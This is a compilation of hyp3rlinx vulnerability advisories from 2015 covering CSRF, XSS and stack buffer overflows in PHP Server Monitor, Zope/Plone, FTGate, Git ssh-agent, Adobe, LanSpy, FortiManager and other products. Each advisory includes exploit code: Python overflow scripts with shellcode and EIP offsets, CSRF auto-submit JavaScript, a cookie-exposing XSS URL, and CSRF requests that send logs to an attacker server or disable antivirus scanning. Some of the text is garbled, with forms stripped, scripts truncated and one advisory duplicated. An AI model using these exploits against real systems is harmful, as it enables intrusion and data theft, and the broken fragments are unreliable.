e.submit()
}


http://localhost/phpservermon-3.1.1/?=user=save=3; 
method="post">


















Exploitation Technique:
===
Remote


Disclosure Timeline:
=
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure



Severity Level:
=
High



Description:
==


Request Method(s):  [+]  POST


Vulnerable Product: [+]  PHP Server Monitor 3.1.1
  


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

PHP Server Monitor 3.1.1 CSRF

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt



Vendor:

www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:

PHP Server Monitor 3.1.1


Vulnerability Type:
=
Cross site request forgery (CSRF)




Vulnerability Details:
=

Multiple CSRF issues in PHP Server Monitor allow remote attackers to add 
arbitrary users & servers to the system, modify system configurations
and delete arbitrary servers, if user (admin) is logged in and visits our 
malicious website or clicks on our infected linxs. As no CRSF protection is
used in the application, we can make request on the victims behalf an the 
server will happily oblige processing our malicous HTTP requests.




Exploit code(s):
===





function doit(){
var e=document.getElementById('HELL')
e.submit()
}



1) add arbitrary users to the system:

http://localhost/phpservermon-3.1.1/?=user=save=0; 
method="post">









 



2) add arbitrary servers to the system:

http://localhost/phpservermon-3.1.1/?=server=save=0_to=;
 method="post">














3) modify system configuration:

http://localhost/phpservermon-3.1.1/index.php?mod=config=save; 
method="post">

























 





4) arbitrary server deletion via GET request:

http://localhost/sectest/phpservermon-3.1.1/?=server=delete=2



Exploitation Technique:
===
Remote



Severity Level:
=
High



Disclosure Timeline:
=
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure




Description:
==


Request Method(s):  [+]  GET / POST


Vulnerable Product: [+]  PHP Server Monitor 3.1.1
  


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

Blat.exe v2.7.6 SMTP / NNTP Mailer Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt



Vendor:

www.blat.net
http://sourceforge.net/projects/blat/



Product:

Blat v2.7.6

blat.exe is a Win32 is a command line eMail tool
that sends eMail using SMTP or post to usenet using NNTP.


Vulnerability Type:
=
Stack Buffer Overflow


CVE Reference:
==
N/A




Vulnerability Details:
=
An older release of blat.exe v2.7.6 is prone to a stack based buffer overflow 
when sending
malicious command line arguments, we need to send two arguments first can be 
whatever e.g. ""
then second argument to trigger the buffer overflow and execute arbitrary code 
on the victims OS.


Stack dump...


EAX 0826
ECX 0018E828 ASCII "Blat saw and processed these options, and was confused by 
the last one...
 AAA...
EDX 0008E3C8
EBX 00E1
ESP 0018F05C ASCII "A...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141   <-- BOOM!

C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 1  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)



Exploit code(s):
===

Python script to exploit...


import struct,os,subprocess


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('

AdobeWorkgroupHelper Stack Based Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt



Vendor:

www.adobe.com



Product:
=
AdobeWorkgroupHelper.exe v2.8.3.3 
Part of Photoshop 7.0 circa 2002



Vulnerability Type:
===
Stack Based Buffer Overflow



CVE Reference:
==
N/A




Vulnerability Details:
=

AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup 
functionality, that lets users work with files on a server that is registered 
as a workgroup.
If AdobeWorkgroupHelper.exe is called with an overly long command line argument 
it is vulnerable to a stack based buffer overflow exploit. 

Resluting in arbitrary code execution undermining the integrity of the program. 
We can control EIP register at about 5,856 bytes, our shellcode will point
to ECX register.

Tested successfully on Windows 7 SP1



Exploit code(s):
===

Use below python script to exploit...


import struct,os,subprocess

#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#
#by hyp3rlinx - apparition...@gmail.com
#hyp3rlinx.altervista.org
#==
#
#0x618b19f7 : call ecx |  {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===

'''
Quick Register dump...

EAX 00270938
ECX 00270A7C <---BOOM!
EDX 00A515FC ASCII "AA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI 
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0  ES 002B 32bit 0()
P 0  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)

'''


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\Program Files (x86)\Common 
Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "

#payload="A"*5852+"R"*4  #< control EIP register

#our shellcode will point at ECX register, so we need to find an JMP or CALL 
ECX and point EIP to that address
#where our malicious code resides, we find it in ARM.dll

eip=struct.pack('

Zope Management Interface CSRF vulnerabilities

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt



Vendor:

www.zope.org
plone.org



Product:

Zope Management Interface 4.3.7

Zope is a Python-based application server for building secure and highly 
scalable web applications.
Plone Is a Content Management System built on top of the open source 
application server Zope
and the accompanying Content Management Framework. 


Vulnerability Type:
===
Cross site request forgery (CSRF)

Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope 
Management Interface).
Patches to Zope and Plone for multiple CSRF issues.

https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope
https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf



CVE Reference:
==
NA



Vulnerability Details:
=

Security vulnerability: 20151006 - CSRF 
ZMI is mostly unprotected from CSRF vulnerabilities.

Versions affected

4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5, 
4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2
4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4, 
4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6
3.3.5, 3.3.4. 3.3.3, 3.3.2, 3.3.1, 3.3

All versions of Plone prior to 5.x are vulnerable.


Fixed by
Nathan Van Gheem, of the Plone Security Team
Coordinated by Plone Security Team

patch was released and is available from 
https://pypi.python.org/pypi/plone4.csrffixes


Exploit code(s):
===




Plone CSRF Add Linxs & Persistent XSS




function doit(){
var e=document.getElementById('HELL')
e.submit()
}


 http://localhost:8080/Plone/Members/portal_factory/Link/link.2015-08-30.66/atct_edit;>
  
  http://hyp3rlinx.altervista.org; size="30" maxlength="511" 
placeholder="" />
  
  



2) CSRF to Persistent XSS -  Zope Management Interface 
++

Persistent XSS via CSRF on title change properties tab, this will execute on 
each Zope page accessed by users.

CSRF to Persistent XSS POC Code:
=

http://localhost:8080/; method="post">

 
 



Disclosure Timeline:
=
Vulnerability reported: 2015-08-30
Hotfix released: 2015-10-06



Exploitation Technique:
===
Remote
Vector  NETWORK
Complexity  LOW
Authentication  NONE
Confidentiality NONE
Integrity   PARTIAL
AvailabilityPARTIAL


Severity Level:
=
6.4 – MEDIUM



Description:
==


Request Method(s):  [+]  POST


Vulnerable Product: [+]  Zope Management Interface & all versions 
of Plone prior to 5.x are vulnerable.


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

LanWhoIs.exe 1.0.1.120 Stack Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt



Vendor:

www.lantricks.com



Product:

LanWhoIs.exe 1.0.1.120

LanWhoIs querys and returns domain (site) holder or IP address informations.


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
==

LanWhoIs contains a file parsing stack buffer overflow vulnerability. The 
program has a whois_result.xml
XML file located under the LanWhoIs directory. This file holds results returned 
from program queries. 

e.g.


  
216.239.37.99
whois.arin.net
02.01.2005 16:17:30
-1
 
We can exploit the program by injecting malicious payload into the 
 node of the local XML file
causing buffer overflow overwriting both pointers to the NSEH & SEH exception 
handlers & control EIP at about 676 bytes.

e.g.

A.shellcode...etc..


WinDbg stack dump

(2048.17cc): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image0040
*** ERROR: Module load completed but symbols could not be loaded for 
image0040
eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi= edi=
eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0 nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010206

image0040+0x4bc8:
00404bc8 8b4af8  mov ecx,dword ptr [edx-8] ds:002b:41414139=
0:011> !exchain
02bdfed4: 52525252
Invalid exception stack at 42424242

registers...

EAX 
ECX 52525252
EDX 7714B4AD ntdll.7714B4AD
EBX 
ESP 04D0F668
EBP 04D0F688
ESI 
EDI 
EIP 52525252


POC code:
==

Run below script, then copy and insert POC payload into  
 XML node
and run the application. Next, select the address in the Results window pane 
and then click Query button
to run a whois lookup or use the 'F3' keyboard cmd to execute and 
KABOOOM!!!


file=open("C:\\Program Files (x86)\\LanTricks\LanWhoIs\\HELL","w")
payload="A"*676+""+"" 
<#KABOOM!!!
file.write(payload)
file.close()



Public Disclosure:
===
October 6, 2015  




Exploitation Technique:
===
Local
Tested on Windows 7 SP1



Vulnerable Parameter:
==
QueryString




===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

LanSpy 2.0.0.155 Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt



Vendor:

www.lantricks.com



Product:

LanSpy.exe 

LanSpy is network security and port scanner, which allows getting different 
information about computer:
Domain and NetBios names, MAC address, Server information, Domain and Domain 
controller etc


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
==

LanSpy.exe uses an 'addresses.txt' plain text file which lives under the main 
LanSpy
directory the file is used to load scanned IPs or URLs 

e.g.

127.0.0.1

replace addresses.txt file with our malicious one, the buffer overflow payload 
must
be the very first entry in the text file. Next, run LanSpy.exe and click green 
arrow
or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we 
will control
EIP at 684 bytes also overwrite both the NSEH & SEH exception handler 
pointers...

Quick stack dump...

(1274.19c4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx= esi= edi=
eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
41414141 ??  ???
0:001> g

(1274.19c4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx= ecx=52525252 edx=7714b4ad esi= edi=
eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
52525252 ??  ???
0:001> !exchain
0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad)
0264fe8c: 52525252
Invalid exception stack at 42424242



POC code(s):
=

import os

#LanSpy.exe buffer overflow POC
#by hyp3rlinx 
#hyp3rlinx.altervista.org
#=

#LanSpy.exe uses an 'addresses.txt' text file
#which lives under the LanSpy directory
#the addresses.txt file is used to load scanned IPs or URLs

#control EIP at 684 bytes... also overwrite
#both the NSEH & SEH exception handler pointers
#---

payload="A"*684+""+""#<--- KABOOM!

file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w")
file.write(payload)
file.close()




Public Disclosure:
===
October 5, 2015  




Exploitation Technique:
===
Local




===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

FTGate 2009 Build 6.4.00 CSRF Vulnerabilities

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt



Vendor:

www.ftgate.com



Product:

FTGate 2009 SR3 May 13 2010 Build 6.4.00


Vulnerability Type:
=
Cross site request forgery (CSRF)


CVE Reference:
==
N/A




Vulnerability Details:
=
Multiple CSRF vectors exist within FTGate 2009 that allow us to add arbitrary 
remote domains,
disable antivirus scanning for various Email file attachment types, and finally 
change settings
to have archived server logs sent to our remote attacker controlled server for 
safe keeping.

Exploit code(s):
===

CSRF(s):






function invertedcross(){
var e=document.getElementById('PUNKSNOTDEAD')
e.submit()
}



1) add arbitrary domains:
-
http://localhost:8089/webadmin/mailboxes/index.fts?action=save; 
method="post">






 


2) sends archived logs to arbitrary remote server:
--
http://localhost:8089/webadmin/config/archive.fts?action=save; 
method="post">





 


3) disable virus scan for .jar or .exe files etc:
-
Options to control handling of virus scanning for email attachments Virus 
Scanning Mode
Operating mode of the virus scanner mode=0 to Disable Virus Scanning.

http://localhost:8089/webadmin/filters/virus.fts; method="post">



 







Disclosure Timeline:
=
Vendor Notification: September 29, 2015 
October 1, 2015 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
=
High




Description:
==


Request Method(s):  [+]  POST


Vulnerable Product: [+]  FTGate 2009 SR3 May 13 2010 Build 6.4.00


Vulnerable Parameter(s):[+]  domadd, extarcserver & mode



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

Git-1.9.5 ssh-agent.exe Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt



Vendor:

git-scm.com



Product:

Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=
Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir 
in Git there is
start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack 
vector in which if
the "start-ssh-agent.cmd" file is replaced with specially crafted malicious 
'.cmd' file we cause buffer overflow, code execution may become possible.

Fault module seems to be msys-1.0.dll

File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46

Stack trace:
-
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax= ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=1DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B


Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOM! we control EIP.


Quick GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax0x   -1
ecx0x680a4c3a   1745505338
edx0x680a4c3a   1745505338
ebx0x28f90c 2685196
esp0x28f884 0x28f884
ebp0x41414141   0x41414141
esi0x28f8fc 2685180
edi0x2660   9824
eip0x41414141   0x41414141
eflags 0x10246  [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43



POC code(s):
===

Python script below to create a malicious 'start-ssh-agent.cmd' file that will 
be renamed
to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause 
buffer overflow and overwrite EIP.

Save following as ssh-agent-eip.py or whatever, run the script to generate a 
new malicious '.cmd' file and run it!

import struct,os,shutil

#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#==

file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "

x=open(file,"w")

eip="A"*4
payload+="B"*968+eip
x.write(payload)
x.close()
src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")


print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "\n"




Disclosure Timeline:
=
Vendor Notification:  August 10, 2015
Sept 26, 2015  : Public Disclosure




Exploitation Technique:
===
Local



Description:
==
Vulnerable Product: [+]  Git-1.9.5-preview20150319.exe



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

Git-1.9.5 ssh-agent.exe Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt



Vendor:

git-scm.com



Product:

Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=
Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir 
in Git there is
start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack 
vector in which if
the "start-ssh-agent.cmd" file is replaced with specially crafted malicious 
'.cmd' file we cause buffer overflow, code execution may become possible.

Fault module seems to be msys-1.0.dll

File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46

Stack trace:
-
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax= ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=1DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B


Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOM! we control EIP.


Quick GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax0x   -1
ecx0x680a4c3a   1745505338
edx0x680a4c3a   1745505338
ebx0x28f90c 2685196
esp0x28f884 0x28f884
ebp0x41414141   0x41414141
esi0x28f8fc 2685180
edi0x2660   9824
eip0x41414141   0x41414141
eflags 0x10246  [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43



POC code(s):
===

Python script below to create a malicious 'start-ssh-agent.cmd' file that will 
be renamed
to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause 
buffer overflow and overwrite EIP.

Save following as ssh-agent-eip.py or whatever, run the script to generate a 
new malicious '.cmd' file and run it!

import struct,os,shutil

#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#==

file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "

x=open(file,"w")

eip="A"*4
payload+="B"*968+eip
x.write(payload)
x.close()
src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")


print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "\n"




Disclosure Timeline:
=
Vendor Notification:  August 10, 2015
Sept 26, 2015  : Public Disclosure




Exploitation Technique:
===
Local



Description:
==
Vulnerable Product: [+]  Git-1.9.5-preview20150319.exe



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

FortiManager v5.2.2 Multiple XSS Vulnerabilities

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt



Vendor:

www.fortinet.com



Product:

FortiManager v5.2.2

FortiManager is a centralized security management appliance that allows you to
centrally manage any number of Fortinet Network Security devices.


Vulnerability Type:
===
Multiple Cross Site Scripting ( XSS ) in FortiManager GUI
http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui



CVE Reference:
==
Pending





Vulnerability Details:
=

The Graphical User Interface (GUI) of FortiManager v5.2.2 is 
vulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities.
2 potential XSS vectors were identified:

* XSS vulnerability in SOMVpnSSLPortalDialog.
* XSS vulnerability in FGDMngUpdHistory.

The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to one
reflected XSS vulnerability and one stored XSS vulnerability.
2 potential XSS vectors were identified:

* XSS vulnerability in sharedjobmanager.
* XSS vulnerability in SOMServiceObjDialog.

Affected Products

XSS items 1-2: FortiManager v5.2.2 or earlier.
XSS items 3-4: FortiManager v5.2.3 or earlier.


Solutions:
===
No workarounds are currently available.
Update to FortiManager v5.2.4.


Exploit code(s):
===

1- Persistent:
https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615=18446744073709551615==3=0=ems=167=0=ALL=167=167_w=1=189=0=50

alert(666)


2- Reflected
https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E



Disclosure Timeline:
=
Vendor Notification:  August 4, 2015
September 24, 2015 : Public Disclosure




Exploitation Technique:
===
Remote & Local



Severity Level:
=
Medium (3)




Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+] FortiManager v5.2.2  & v5.2.3 or earlier


Vulnerable Parameter(s):[+] vdom, textarea field


Affected Area(s):   [+] sharedobjmanager, SOMServiceObjDialog


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

Microsoft Exchange Information Disclosure

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MS-EXCHANGE-INFO-DISCLOSURE.txt



Vendor:

www.microsoft.com



Product:

Microsoft Exchange Outlook Web


Vulnerability Type:
===
Information Disclosure


CVE Reference:
==
CVE-2015-2505
http://www.securitytracker.com/id/1033495




Vulnerability Details:
=
Microsoft Exchange Outlook Web Access Lets Remote Users Obtain Potentially 
Sensitive Information

Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2013 SP1, 2013 Cumulative Update 8, 2013 Cumulative Update 9

A remote user can obtain potentially sensitive information on the target 
system. 
Outlook Web Access (OWA) does not properly handle web requests. A remote user 
can send a specially crafted request to the target web application to view 
potentially sensitive stack trace information on the target system 
[CVE-2015-2505].



Exploit code(s):
===
N/A



Disclosure Timeline:
=
Vendor Notification: April 10, 2015
Sept 8, 2015  : Public Disclosure



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

IKEView.exe R60 Stack Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt



Vendor:

www.checkpoint.com
http://pingtool.org/downloads/IKEView.exe



Product:
==
IKEView.exe Feature Pack NGX R60 - Build 59104

IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall 
phase(1 & 2) packets being exchanged with switches and gateways.

IKEVIEW is a Checkpoint Partner tool available for VPN troubleshooting purposes.
It is a Windows executable that can be downloaded from Checkpoint.com. 
This file parses the IKE.elg file located on the firewall.

To use IKEVIEW for VPN troubleshooting do the following:

1. From the checkpoint firewall type the following:

vpn debug ikeon

This will create the IKE.elg file located in $FWDIR/log


2. Attempt to establish the VPN tunnel. All phases of the connection will be 
logged to the IKE.elg file.


3. SCP the file to your local desktop.
WINSCP works great

4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file.




Vulnerability Type:
==
Stack Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=
IKEView.exe is vulnerable to local stack based buffer overflow when parsing an 
malicious (internet key exchange) ".elg" file.
Vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after IKEView 
parses our malicious file, which may result then
result in arbitrary attacker supplied code execution.


0018F868  |41414141  
0018F86C  |01FC56D0  ÐVü  ASCII "File loaded in 47 minutes, 00 seconds."
0018F870  |41414141  
0018F874  |41414141    Pointer to next SEH record
0018F878  |42424242    SE handler
0018F87C  |0002   ...


Quick Buffer Overflow POC :
===


1) Below python file to create POC save as .py it will generate POC file, open 
